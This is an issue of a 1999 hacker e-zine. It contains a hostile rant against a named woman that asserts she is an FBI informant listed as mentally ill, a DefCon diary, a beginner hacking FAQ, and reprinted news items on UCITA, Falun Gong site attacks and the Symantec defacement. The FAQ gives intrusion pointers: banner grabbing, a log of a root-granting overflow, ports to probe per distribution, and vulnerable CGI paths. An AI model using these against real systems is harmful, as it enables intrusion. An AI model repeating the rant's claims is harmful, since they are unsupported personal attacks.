enjoying the ebb and flow of the convention we've come to know and love... Late into the night we had a great time recounting times past. As the night progressed, we moved the group out of the bar into the hotel foyer where our merriment was abruptly halted. The foul stench of insanity lingered in that part of the hotel, and it was instantly known to all that Carolyn was upon us. Initially, I found myself finding a good deal of humor with her attire, I pondered the drifter's corpse that she absconded her dress from, and focused on my mission at hand. The question on everyone's lips: "Is Virginia here this year?" However, before I could gather my senses, a whirlwind of stupidity was unleashed as Carolyn's disease attempted to spread to another mind. With her gaping maw open, she turned the boring-machine up to 11 and hosed down an unsuspecting convention-goer. With all that had happened, I was stunned. This was the heaviest blow of all. I could find no other recourse but to confront her on one of the numerous topics that burn in the scene. It was, at that time still unclear to me why she had misinformed the FBI that I was involved in HFG, and I decided to question her on that, in the hopes of two results. Intended result #1 was to shut her the fuck up for a minute. Intended result #2 was to get an explanation, apology, or at best a rationalization. However, as she turned to me with the vapid stare of ignorance, I knew no one could win this battle. No good would come from this conversation, and Carolyn made sure of that. Initially, Carolyn feigned stupidity (which was eerily convincing, but even the best lies are peppered with truth) and claimed she didn't know me. Having dealt with this woman numerous times (including a few *shudder* face-to-face meetings) and given she tried to implicate me within the ranks of HFG, the ruse lacked even humor, as the attempt was so weak. After a few hot comments were traded, Carolyn's attempt at throwing down the gauntlet was to challenge myself and my cohorts to 'hack' into her modified Linux box. Now, perhaps Carolyn misunderstands the way the new generation of hacker-types operate. First of all, we don't get out of bed for less than a hundred dollars. And we certainly don't waste our time breaking into a machine that serves no real purpose. Why Carolyn used her box in the capture the flag competition as a challenge is beyond us, as her personal website has been hacked more times than are worth counting. And honestly, at this point, who hasn't received a DCC offer of her mailbox or home directory tarred up? If that is not evidence of her inability to truly secure a box, then I don't know what is. Granted, she wished to rest on her insignificant laurels, and a subtle crack about using finger to break into her box was sufficient to diffuse that portion of the conversation. With her last karate-inept leg kicked out from underneath her, Carolyn attempted to leave with a modicum of respectability, which sadly slipped from her grasp due to her own failings and incompetence... The Granny Hacker from Heck? Hardly (except the older-than-dirt part). The Clown Princess? I suppose this is half true. Clowns are an amusing sort, accustomed to being ridiculed. But I think she missed the princess bit by about 30 years. The Happy Hacker? She didn't seem very happy to us. Especially with the 3 part Antionline article, that starts off attempting to be slightly informational, but ends up being a diatribe of self-promotion and bitter remarks about convention goers. No Carolyn, you're not part of "the club". We're sorry, but you're too crazy, too medicated, too old, and too stupid. Also, Carolyn, you had more than a week between the end of DefCon and the posting of the Antionline article. The best insult you could come up with was to say I `pumped my muscles up with a bike pump`? I mean, what sort of 1940's street-tough book of insults are you consulting? Double dumbass on you Carolyn. Contrary to what she swears up and down, Carolyn Meinel is indeed a confidential informant for the Federal Bureau of Investigation, and her status is listed as "MI" and "PS". MI indicates that the informant suffers from a mental or emotional dysfunction, and all information must be scrutinized as such. PS means that she is a probable suspect. This is why the FBI polygraphed her. Do you trust her? Now, don't get us wrong. We actually like Carolyn Meinel. As Virii makers have a symbiotic relationship with companies that make Anti-Virii software, true hackers and their ilk have a symbiotic relationship with the uninformed vocal nay-sayers that try to misinform the public as to our actions. Without Carolyn, no one would know how great we really are. It is impossible to fully appreciate what `good` is when you have no frame of reference in understanding what `bad` is. For this, we can only thank you Carolyn. Your efforts and misinformation only further our roles as highly paid debunkers of your insanity. When you're 65 and retired, or possibly deceased -- we'll just be entering the prime of our lives and professional careers. If you're still around then and your descent into lunacy hasn't pushed you over the brink, look us up. We love clowns. And, by the way Carolyn, do send Virginia my love. @HWA 04.0 DefCon 7 by Agent X ~~~~~~~~~~~~~~~~~~~ (Thanks to Agent X for permission to reprint this - Ed) Defcon 7 by Agent X Prelude Defcon baby, yeah that's the ticket, hackers, computer security consultants, feds, kooks, surveillance geeks, and a whole slew of other weird ass spooky mother fuckers, get drunk, go to titty bars, talk about crypto and network security, fucking with the media, blowing shit up in the desert and generally have a great fucking time in the city of sin all under the guise of a computer security convention. And if they are lucky or sneaky paid for by their respective bosses. I am neither lucky or sneaky so I'm paying for this out of my own pocket, which by the way sucks. But I'm ready the tickets are bought the gear is packed. I have fortified myself for this trip, with a bowl of corn flakes, a cache of CDs, and a hangover. I dry swallow two Alleve as I step out the door. The 3 hour bus ride to the airport was about as exciting as a 3 hour a bus ride can be. In other words deathly boring. But the headache is gone. I'm at the airport lounge, drinking a L.I.T and trying to figure out if 7 buck is to much to pay for a burger. Airports are about the most boring places to be stranded for any length of time as well. The televisions only show 2 things, golf or 5 minute news reels. The food is generic and expensive. And there is no fucking place to check my e-mail. Only another 4 hours till my plane leaves. The Plane: It's a sign when 12 mothers carrying screaming babies get on the flight. We hit the worst turbulence I have ever seen or felt. [the guy beside just used his barf bag for it's intend purpose]. I can see it now the wings snap off and barrrroooooooom! I'm just another flight statistic. Wouldn't that just be the rats asshole to die on the way to Detroit. [Note at this point this article goes into short hand mode, there was just to much happening to quickly for me to mention, remember or talk about] Friday From this point on things be come an insane blur of meeting new people and getting things done. I arrive 3 hours late to the hotel, the people I'm staying with had a hell of a time checking in and I'm exhausted , I have a glass of water and go to bed. Friday First day of con I get up, get dressed and eat some breakfast all by 7:00. To do my part by gooning at the con. Big mistake It's a mad rush after that, from getting a goon badge to working on pre-registration. The List for registration is great except that it's not in any order. So I GREP the whole list a couple of hundred times during the con. I check people in all day long. By the end of the day I know almost everyone at con who is on the list. Naked people count for Friday: 1 guy gets up on a table and strips down to his G-string, 2 naked fat guys jog around the vendor area for free t-shirts 1 babe hops up and a table and gives everybody a show of her tits. I love Vegas. The day is hectic and long. I'm exhaust by the time I sit down at 7:17 to write this before heading out to the MGM grand for some dinner. Vegas is a weird as ass place. New York New York the most disturbing of all. The fake graffiti, the fake manhole cover with fake steam, all in fake NYC it is not right I was just waiting for a fake mugging in a fake dark and dirty alley. After getting back to the hotel I collapsed on the bed. Saturday Slept a hard 8 hours last night, got up and help register people, mad craziness more people then you could possibly images. All of them young white males. Checked out the DJ action, saw my ghetto hacker buddies TDA and Jester 47 spin some mad tunes to Ninja Scroll video. The CDC show rocked ass. Total mayhem, with a revival theme, it doesn't get much better then this. Things slowed down a bit. Checked press badge for the After CDC presentation in the media suite. Went up and talked with some media types. Got to see what the media is like in action. I expected to hear some really probing question that were well researched and insightful. They weren't, nuff said. Finally got to chill about 7 or 8 helped set up for the root suite party. Went back to my room changed and got booze, went back to the root suite and proceed to drop a complete bottle of tequila on the floor. Saturday night Mad partying in the root suite Saturday night. I played bartender for most of the night, pouring DoC beers, serving punch and mixing drinks. Dis Org Crew beer was great. The Strawberry SYN Flood was smooth and sweet, the Brown Box Barley Wine was strong as hell, and the FireWire Stout which is fortified with caffeine is the perfect hacker beer. Congrats to HCF, Wyatt Earp, Pete Shipley and the rest of the DoC who helped for a great beer. Caezar defiantly knows how to throw a party. Towards the end of the night I was getting help from Jennifer Grannick. Left about 4 or 5 went back to the room and slept like the dead. Slept for 2 hours and got back up. I had a English muffin for breakfast it was good. Sunday By Sunday the kinks had been somewhat worked out and things were finally running reasonable smoothly, I helped with this and that. Sold shirt and mugs for the better part of the morning, some guy wanted to trade a rental car for a t-shirt, I told him to get permission from Priest. He ended up trading us some porno passes for a shirt instead. Finally had lunch with some cool people's one of which was with the NSA. After lunch I'm up in the media/goon lounge resting and eating some fruit with Major Malfunction when his radio goes off, "all goons to the NOC" and then "Carolyn is being kicked out" Needless to say Carolyn got kicked out of con.. I'm sure that she will write all about it on her web site. I'm sure she will paint herself as the victim, either way I don't care, she is an adult and she should have known better. After word I wandered around some more. Said good-bye to all the people I could find. Went back to the hotel grabbed my bag want got on a plane fell asleep. Switch planes fell asleep. got off plane got on bus fell asleep, switch busses fell asleep. Got off bus got home fell asleep. ....till next year. Quotes from the weekend: A short conversation I had with some newbie kid who wandered into the root party. " So your in l0pht" " oh yeah me and the rest of the east coast people" "really" "My son did his first hack at age 7, I was so proud." Major Malfunction. Who Agent X is a slacker. The views, commentary and ideas expressed in this article are not those of Hacker News Network, it's Editors or the Defcon Organizers. I own my own words. Agent_X@flashmail.com Links referenced in the original HTML version of this article: http://www.defcon.org http://www.cultdeadcow.com/ http://www.dis.org/doc.html http://www.dis.org/warz/beer.html http://www.caezarschallenge.org/ @HWA 05.0 Hacking Faq by ben-z 5/14/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There are a number of "hacking faqs" around the net most of which date back at the very least to 1996 this is one of the few 'new' ones i've come across, so i've decided to share it here for your reading pleasure, its aimed at the 'newbie hacker' and is written by a well known underground denizen, ben-z - Ed Found at http://come.to/sota [**] FAQ: Hacking @ 5/14/99 by ben-z [**] NOTE: if date > */2000, dont bother reading this. http://www.slacknet.org | benz@slacknet.org A. Section [I] -- Beginners (index) 01. How do i tell if a system is running UNIX? 02. How do i determine which flavor of UNIX a system runs? 03. What exactly happens when i "hack" UNIX? 04. Do I need an account on a system to hack it? 05. What is DoS? 06. How do I protect myself from DoS attacks? 07. What is a buffer overflow? 08. What are some good web/ftp sites for UNIX? 09. What is BSD? 10. What is Linux? 11. What does x86 have to do with anything? 12. What else is there besides x86 systems? 13. What are some commonly open services to look for? 14. What is the easiest way to hack a system right now? 15. Can i hack anything from windows? 16. Why is Linux a better OS than windows? 17. What is suid/sgid? 18. Where is the best source of info for newbies? 19. How much trouble can I get in for hacking? 20. What kind of system should I try hacking first? (Q/A) 01. How do i tell if a system is running UNIX? A: There are several ways to determine the operating system of a remote system. The first and foremost way to determine if a system is running UNIX is to both telnet and ftp to it, then check the login message. For telnet, if you get anything like BSD, UNIX, Linux, AIX, IRIX, or HPUX then it is most likely a unix system. However, it is possible to change the message displayed (/etc/issue.net) when a telnetd connection is established, so telnet banner grabbing is not always the most reliable. Via ftp, you can usually make a fairly accurate guess at the OS by looking at the ftpd version. If you see something like wu, ncfptd, or proftpd, then it is a UNIX system. Most large ftp archives run UNIX, but just in case, look for a message containing "Microsoft" or "Serv-U", which do not run on anything but ms windows (bad!). Another more accurate way of determining the OS is to examine the packets via predetermined OS fingerprints. There are several packages out now which do this, the best of them being nmap by fyodor (http://www.insecure.org/nmap), and queso by els apostols. These simply scan the open ports on a system and attempt to find a match for the packet types. Nmap currently includes hundreds of OS fingerprints, and is known for its accuracy and speed. OS fingerprinting is not one-hundred percent accurate either; the details of this are too complex for this paper. Basically, some system administrators change the look of the outgoing packets to fool your scanner into thinking it is something else, or give it no reading whatsoever. the details are available at http://www.geek-girl.com/bugtraq. 02. How do i determine which flavor of UNIX a system runs? A: (see telnet banner grabbing description above) -- telnet banners often reveal which OS and version the system is running. If you have local access to the machine (an account), then you can type uname -a to see some system information. On Linux, you can cd to /proc and cat cpuinfo for other interesting stats. If the system is running RedHat Linux, then a file exists in /etc called redhat-release which contains the release and version of the system. I am also working on a package to determine the distrobution of a system via comparing rpm's to known fingerprints (similar to nmap), thus making it easier to find an exploit which will work on the system. 03. What exactly happens when i "hack" UNIX? A: To know whether or not you have successfully "hacked" a UNIX system, there are a few commands you need to be familiar with: _______________________________________________________________________________ | command | description | |-----------------------------------------------------------------------------| | id | prints your current UID/GID. 0 = root = success! | | whoami | determines which user you are logged in as. | | set | shows a list of some system variables including $USER and $EUID. | ------------------------------------------------------------------------------- If you don't know what root is, then you need to do some background UNIX research before reading this again. Otherwise, here are a few other tricks to see if you are really root. a. bash prompt: When logged in as a normal user, you usually have a prompt similar to bash$. As root, your prompt defaults to bash#. b. system variables: typing echo "$USER / $EUID" *should* effectively tell you which user the system thinks you are. c. file access: As root, you should have access to read/write most files. Try logging in as a normal user and reading /etc/shadow or /etc/passwd. Most systems do not allow normal users to read these files for security reasons however, if you are root, you may read/write them as you wish. 04. Do I need an account on a system to hack it? A: No. Many systems can be compromised remotely via overflows in vulnerable services running. This is the main difference between hacking UNIX and NT: UNIX was designed with remote administration in mind, thus making it easier to manipulate once access is obtained. With NT, no telnet daemon is present, and playing around usually requires your presence at the actual system itself. Of course anyone with 1/2 of a brain can secure their system from remote attacks, so a local account is a definate bonus. 05. What is DoS? A: No kiddies, this isnt C:\DOS. This is Denial of Service, a very deadly (and lame) concept. As there are very few useful purposes for DoS, it is mostly used to show power and skill, even though it requires almost no skill whatsoever. The only useful reason i can think of to DoS a system is for spoofing purposes: when a system is taken off of a LAN, you can change your address to the one you knocked off, and intercept vital information and user passwords. This is explained in detail at http://www.rootshell.com (under documentation) look for whitepapers on tcp hijacking. Ok, back to my explanation of DoS. Denial of Service by definition is simply denying service to any machine on a network, thus causing problems and/or crashing the system. The most popular DoS attacks out right now (to my limited knowledge) are papasmurf, boink/poink, feh, smack, bmb, and synk5. These are commonly used toys on irc, so watch your back. 06. How do I protect myself from DoS attacks? A: There is no one-hundred percent reliable method for stopping DoS attacks. If the attackers bandwidth is much greater than yours, then you lose: end of story. However, if the attacker has equal or lesser resources than you, they are easily filtered out by software such as ipfwadm for linux 2.0.x, ipchains for linux 2.2.x, and conseal pc firewall for windows. Some interesting firewall/filtering scripts can be found at http://www.freshmeat.net and http://www.linuxberg.com. If you like to chat on irc (yay!), then it is wise to use a bnc (bounce) to hide your real address and virtually irc off of a faster connection. bnc source is available for download at ftp.bitchx.org/pub/misc. 07. What is a buffer overflow? A: In short, a buffer overflow is the pushing of data onto a stack, thus executing carefully constructed code as the user the program is running as. Example: [benz@oldbox]$ whoami benz [benz@oldbox]$ /usr/bin/sperl4.036 AAAAAA(etc..) [garbage]/bin/sh Segmentation Fault [root@oldbox]# whoami root The above log is an example of the classic sperl overflow which drops root access. To make sure the program you are trying to overflow will give you root, you need to type ls -al file and look for "s" in the permissions somewhere, and that it is owned by root. This indicates that the program is suid/root and when run will actually switch to user root and execute. This explanation is a very short and simple version of a complex topic, which can be studied in more detail at http://www.phrack.com - issue 49-14: "Smashing the Stack for Fun and Profit" by Aleph One. 08. What are some good web/ftp sites for UNIX? A: Bugtraq security mailing list: http://www.geek-girl.com/bugtraq rootshell archives (out of date): http://www.rootshell.com technotronic archives: ftp://ftp.technotronic.com SlackNet: http://www.slacknet.org Linux.org: http://www.linux.org FreeBSD.org: http://www.freebsd.org Packetstorm: http://packetstorm.genocide2600.com 2600 magazine: http://www.2600.com Phrack magazine: http://www.phrack.com 09. What is BSD? A: BSD, short for Berkeley Systems Distrobution, is a UNIX flavor known for its stability and ease of use. More information can be found at http://www.freebsd.org, http://www.openbsd.org, www.bsdi.org, etc. 10. What is Linux? A: Linux, originally developed my Linus Torvalds, is a POSIX based OS commonly used by everyone from hackers to goat feeders. more information can be found at http://www.linux.org. 11. What does x86 have to do with anything? A: x86 is the standard abbreviation for an intel processor based system. the x has nothing to do with the processor, it is simply a wildcard definition for all *86 systems. Example: i386, 586 (pentium). 12. What else is there besides x86 systems? A: Besides Intel based systems, their are many other architectures used with UNIX. Probably the most common non-x86 architecture is a sparc. Although capable of handling almost anything, these typically run either SunOS or Solaris. 13. What are some commonly open services to look for? A: The services i generally look for the most are very dependant on what OS the target is running. For example, if the target system is Linux 2.0.3x, I typically scan for rpcbind/portmap on tcp/111 because of the well known mountd overflow. Below is a brief list of what I check for specifically on several operating systems. Redhat 4.2: tcp/143 (imap), etc.. RedHat 5.0: tcp/25 (sendmail), tcp/143 (imap), tcp/25 (qpop), tcp/53 (bind) RedHat 5.1: tcp/111 (rpcinfo -p ), tcp/110 (qpop), tcp/53 (bind) RedHat 5.2: tcp/21 (wu-2.4.2-academ[BETA-18](1)) Slackware: tcp/111 (rpc), tcp/110 (qpop), tcp/21 (wu-ftpd), tcp/53 (bind) FreeBSD: tcp/110 (qpop), tcp/143 (imap), tcp/53 (bind) Solaris: tcp/110 (rpc), tcp/53 (bind) 14. What is the easiest way to hack a system right now? A: 15. Can i hack anything from windows? A: Suprisingly, yes. There are about 50 different ways you can hack with just a web browser. These are known as cgi exploits; below is a list of several which i typically check for: /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/Count.cgi /cgi-bin/info2www /_vti_pvt/service.pwd /cgi-bin/test-cgi /cfdocs/expeval/openfile.cfm /cgi-dos/args.bat /cgi-win/uploader.exe 16. Why is Linux a better OS than windows? A: There are hundreds of reasons why Linux owns windows, but instead of explaining all of them, I'll just give you some advice: take my word for it. If you happen to be one of those people that needs facts to survive, check out http://www.darkelf.net/metachart. 17. What is suid/sgid? A: 18. Where is the best source of info for newbies? A: My best reccomendation would definatly have to be irc. Since most hackers tend to learn things on their own, hacking resources are not as plentiful as they probably should be, but there are still excellent sources available. See the URL section above for more information. 19. How much trouble can I get in for hacking? A: The typical student hacker (such as me) is still under the age of 18, rendering him a minor. If adult charges cannot be filed, then don't worry about much other than a harsh bitching and possibly a small fine. For those of you that no longer have the age advantage, I reccomend consulting a lawyer before getting seriously into hacking. This may sound a bit extreme, but anyone who gets good enough to be noticed needs a lawyer eventually anyway. For some information on what can happen as an adult, just take a look at http://www.kevinmitnick.com. 20. What kind of system should I try hacking first? A: For beginners, the first computer I reccomend trying to root is your own. Their is no better way of security and learning than a local machine that you actually own and operate. Try experimenting with several UNIX flavors such as Linux and BSD, then it's up to you from there. [**] dont worry.. part [II] Intermediate instruction is coming! [**] @HWA 06.0 Group approves controversial software law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y http://www.infoworld.com/cgi-bin/displayStory.pl?990729.ecucita.htm Group approves controversial software law By Jack McCarthy, Nancy Weil, and Jessica Davis InfoWorld Electric Posted at 5:00 PM PT, Jul 30, 1999 In a blow to both big corporate software consumers and those who buy their software in retail stores, a group that works to unify state laws this week passed the Uniform Computer Information Transactions Act (UCITA) legislation, which is widely opposed by software consumer advocates, software developers, and IT organizations. The legislation will theoretically allow software vendors to repossess software by disabling it remotely, and to disclaim warranties. It will also prevent the transfer of software licenses from one party to another without vendor permission, and will outlaw reverse engineering. UCITA's opponents said that its development was heavily influenced by software manufacturers, and that it favors them in software contracts and disputes concerning software licensing. "What purpose is it going to serve other than litigation and additional cost to users?" said Michael Scott, a senior engineer at the California Department of Transportation, in Sacramento, Calif. "It sounds like a great coup for the software industry, but doesn't sound very advantageous for users." Members of the National Conference of Commissioners on Uniform State Laws (NCCUSL) voted on UCITA and several other revisions to the commercial code at their annual meeting in Denver. In a state-by-state vote, 43 states approved UCITA, six opposed it, two abstained, and two were not present at the voting. The proposal now goes to various state legislatures for approval. Most or all states typically approve the laws recommended by the NCCUSL. IT opposition to the legislation, including a letter-writing campaign to members of the NCCUSL, failed to sway the commissioners. The dry, complex language of the 123-page legislation may also have contributed to a lack of understanding on the part of many software users. Proponents of the legislation have said that UCITA is a necessary step in defining the law regarding software and computer information sales, which were not contemplated when the Uniform Commercial Code (UCC) for the sale of goods was written. The act means both vendors and users will be able to count on a uniform law, instead of relying on differing laws on a state-by-state basis, according to Ray Nimmer, a law professor at the University of Houston Law Center and the law's primary author. "We think that this will extend the rights of end-users," Nimmer said. Nimmer said that the opposition to the law during the last year and a half has been punctuated by hyperbole, and now it is critical that the debate shift over to reality. Opponents to the legislation include technology consumer groups, various trade associations, and some law professors, who contend that UCITA will result in increased costs for companies, while giving software vendors undue power. "This law is going to be bad for the industry and for the country," said Cem Kaner, a software developer, attorney, and author who has taken a lead in fighting the proposal. "It redefines intellectual property law in a way that transfers huge amounts of power from the public, including universities, libraries, and [software] customers, to software publishers." In the days before the final UCITA vote, several state attorneys wrote letters to the president of NCCUSL, urging the group to reject the law. An estimated 25 to 28 attorney generals have gone on the record in opposition, including those from Connecticut, Idaho, Indiana, Iowa, Kansas, Oklahoma, Pennsylvania, and Washington state. The National Conference of Commissioners on Uniform State Laws, in Chicago, is at www.nccusl.org. Jack McCarthyis a San Francisco correspondent for the IDG News Service, an InfoWorld affiliate. Nancy Weil is a Boston correspondent for the IDG News Service, an InfoWorld affiliate. Jessica Davis is an InfoWorld associate news editor. @HWA 07.0 Falun Gong Web Sites Attacked by China? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tacscan Web sites of the group Falun Gong a meditation group is claiming that the web sites of its supporters are being target and attacked by China. Initial evidence seems to point to the Public Security Ministry's Internet Monitoring Bureau as the agnecy responsible for various attacks. Falun Gong, outlawed in China, is a group that draws on martial arts, Buddhism and Taoism and is devoted to physical and mental fitness, high moral standards, and denies that it is either a religion or a political movement. Boston Globe http://www.boston.com/dailynews/211/nation/Chinese_officials_try_to_hack_:.shtml Chinese officials try to hack U.S. Web sites, meditation group members say By Peter Svensson, Associated Press, 07/30/99 16:17 NEW YORK (AP) Web sites in the United States and elsewhere devoted to the Falun Gong meditation group are coming under heavy electronic attack, managers of the sites said Friday, and at least one ''hacking'' attempt appears to trace back to a Chinese national police bureau in Beijing. Falun Gong has been banned in China, where communist authorities are engaged in an escalating crackdown, arresting adherents and confiscating publications and videos. Bob McWee, of Middletown, Md., a Falun Gong practitioner, said a site he maintains to promote the group, www.falunusa.net, has been under persistent electronic assault. In a telephone interview, McWee said his Web server was undergoing a continuous ''denial-of-service'' attack, a common Internet tactic used to overwhelm a computer with repeated electronic requests like a telephone ringing nonstop to block other callers. In addition, someone tried to gain access to the server, pretending to be a legitimate webmaster, and in the process left an Internet address, he said. ''They tried to hack my machine from theirs. And they can't do that without revealing their'' Internet address, he said. The address McWee said was left behind is registered with the Asia Pacific Network Information Centre, a public registry service for Internet addressees. According to the service, there are two phone numbers in Beijing listed with that address. When The Associated Press called the numbers, a person who answered the phone identified them as belonging to the Public Security Ministry. A telephone operator at the ministry said they belonged to its Internet Monitoring Bureau. Ministry officials and spokesmen refused to comment Friday. McWee registered a complaint about the hacking attempt with the Maryland state police's computer crimes division. Police spokesman Pete Piringer said that because the attack did not succeed in getting access to McWee's server, there did not seem to be a crime committed. A U.S. government agency saw an indirect sign of the attacks. A network engineer at the U.S. Department of Transportation contacted McWee when they noticed his server was contacting one of their computers unasked, according to Everett Dowd, deputy director of telecommunications of the Information Technology Operation at the department. McWee said this was because the denial-of-service attack sent requests to his server with forged return addresses, one of which happened to be the department's server. Administrators of other Web sites devoted to the movement also said they had been attacked. Li Shao, in Nottingham, Britain, said the site he maintains was hacked into Monday. What he called Chinese ''government propaganda'' was placed on some pages, while others were deleted. Jillian Ye, of Toronto, Canada, who maintains two sites, said that beginning one or two months ago, her server began going down almost every day. The problems got progressively worse, until she recognized the symptoms of an attack and moved the sites to a more secure server. In their barrage of criticism of Falun Gong, Chinese state media have cited the group's Internet presence as proof that it was well-organized and not just harmless meditation buffs. A government ban on Falun Gong publications passed after the group was outlawed includes electronic publications. Nearly all of Falun Gong Web sites in China have been shut down since the ban was announced. China's communist leaders banned the Falun Gong movement last week, accusing it of trying to develop political power. Falun Gong leaders have denied any political ambitions and denied they organized protests that erupted two weeks ago after authorities reportedly arrested leading members of the group. Falun Gong, founded by Li Hongzhi, who now lives in the United States, draws on martial arts, Buddhism and Taoism. The group says its goals are physical and mental fitness and high moral standards, and denies that it is either a religion or a political movement. Associated Press Writer John Leicester in Beijing contributed to this report. @HWA 08.0 Super Computer Almost Gets Away ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Mudge Sandia National Laboratories sold a surplus nuclear weapons research computer, an old Intel Paragon XPS, as "spare parts", without the OS to a Chinese national in California for $30,000 last October. Quing-Chang Jiang, a citizen of the Peoples Republic of China, then tried to buy the parts from Intel needed to make it run again. After conferring with the DOE, Sandia then paid $88,000 two weeks ago to get it back because of security worries about the deal. The computer, the fastest in the world in 1993, while now obsolete by U.S. standards, could have aided a foreign government in duplicating the advanced work done by US nuclear weapons labs. (Super Computers just aren't that hard to get a hold of these days, even fully functional ones.) San Jose Mercury News - second story http://www7.mercurycenter.com/premium/nation/docs/natwashdig24.htm < link broken/Story missing - Ed > Posted at 8:57 p.m. PDT Friday, July 23, 1999 U.S. buys back computer sold to Chinese citizen Associated Press WASHINGTON -- The Energy Department's Sandia National Laboratory last week bought back a supercomputer it had sold as surplus to Korber Jiang, a Chinese citizen who is the principle of EHI Group USA and exports American goods to his home country. Rep. Curt Weldon, R-Pa., called Friday for Energy Secretary Bill Richardson's resignation, saying that the computer could have been used ``to design nuclear weapons.'' ``He's going around the country saying there are no problems in the Department of Energy, that everything is under control,'' Weldon said in a telephone interview. ``If there are no problems, then how can this happen?'' Neal Singer, a spokesman for Sandia National Laboratories, said that the New Mexico facility sold the Intel Paragon XPS to Korber's one-man company for $30,000 in October. After discovering Korber's nationality, Singer said, the department bought back the computer for $88,000 last week and stored it under guard at Sandia. The spokesman said the difference in cost may have been due to shipping costs incurred by Korber. ``Secretary Richardson has instituted a moratorium on any sales of surplus material that incorporates export control technology until there has been a thorough review of what happened,'' said Energy Department spokeswoman Brooke Anderson. The transaction was first reported by Insight Magazine. @HWA 09.0 Symantec's website hacked ~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y It was rumoured that the site was not only hacked but also infected with virii, this article tries to clear up the story, ZDNET - ed http://www.zdnet.com/filters/printerfriendly/0,6061,2307804-2,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Symantec: Vandals didn't infect us By Robert Lemos, ZDNN August 2, 1999 2:02 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html Internet vandals broke into the servers of network security and utilities firm Symantec Corp. Monday morning, defacing the company's Web site. While the vandals claimed to have infected Symantec's network two months ago with a worm, quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems. "There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders, a spokesman for the Cupertino, Calif., company. "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home page." The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The document was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday. Worms are virus-like programs that infect systems through networks automatically and without the need for an unknowing user to open a file or run an application. Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard nut to crack. The only difference: This time someone actually got in. "What this incident does show is that you cannot be complacent towards this kind of threat," said Saunders. The Symantec spokesman could not detail how the cyber vandals entered the company's network. Symantec engineers took down the page within an hour of its posting, but not before the media in Europe got wind of the defacement. The BBC posted a story early Monday morning. -=- BBC; Anti-virus company hacked A leading provider of net security and anti-virus software, Symantec, has had its website hacked for about 12 hours, ending around 1300 BST. The FBI has been informed and is already beginning an investigation. Visitors to www.symantec.com early on Monday found a page claiming that a group of five crackers had infiltrated Symantec's servers with a virus called bloworm. The crackers said that their virus, a worm, has been spreading around Symantec's network, infecting files for two months. However, Aled Miles, Symantec's Regional Director for UK and Ireland, told BBC News Online: "I can categorically state that there is no effect on our servers internally - that is a hoax which adds to the publicity wagon." He added that: "We have established that there was no risk [of infection] to anyone visiting our website during that time." Symantec are the makers of Norton Anti-virus software and their UK website says: "Symantec is a leader in Internet and content security." The hacking of their website will be seen as embarrassing but Mr Miles said that any organisation, even the CIA itself, could fall prey to malicious attacks like these. He said: "The sad reality is that whilst the Internet is a tremendous new technological force, it comes with its down side. What matters is how quickly we as a company react to this type of incident. "What I am not embarassed about is the speed and agility we have shown in sorting this out. I don't think it damages our reputation in the slightest." Symantec has become a higher profile target in recent months due to its work in combatting viruses such as Melissa, explore.zip and the program Back Orifice. @HWA 10.0 New virus due to hit town "New virus spills your beans " - BBC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y BBC http://news.bbc.co.uk/low/english/sci/tech/newsid_381000/381054.stm Tuesday, August 3, 1999 Published at 15:11 GMT 16:11 UK New virus spills your beans A new strain of computer virus could distribute your highly confidential documents all over the Internet. Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from destroying vital files, the virus will make sure everyone can see them. The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others. New virus on the block One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them. Java and ActiveX - next infection target It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and particularly ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. @HWA 11.0 New York Times Debunked - FIDNet Moves Ahead as Planned ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ted The Register has taken the time to actually read the draft proposal reported on last week by John Markoff of the New York Times. The draft proposal, now seven weeks old, calls for the creation of the Federal Intrusion Detection Network, or FIDNET. When the NYT reported on this story last week privacy advocates cried foul claiming that such a network would intrude on personal freedoms. Obviously a closer look at the document is warranted. The Register http://www.theregister.co.uk/990730-000022.html Officials from the CIAO and NIPC and other groups have said that the recent media attention and public outcry over the proposed FIDNet will not prevent the plan from going forward. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html The Register; Posted 30/07/99 7:31pm by Thomas Greene in Washington US net snooping plans debunked Terror spread across the Net on Thursday when New York Times correspondent John 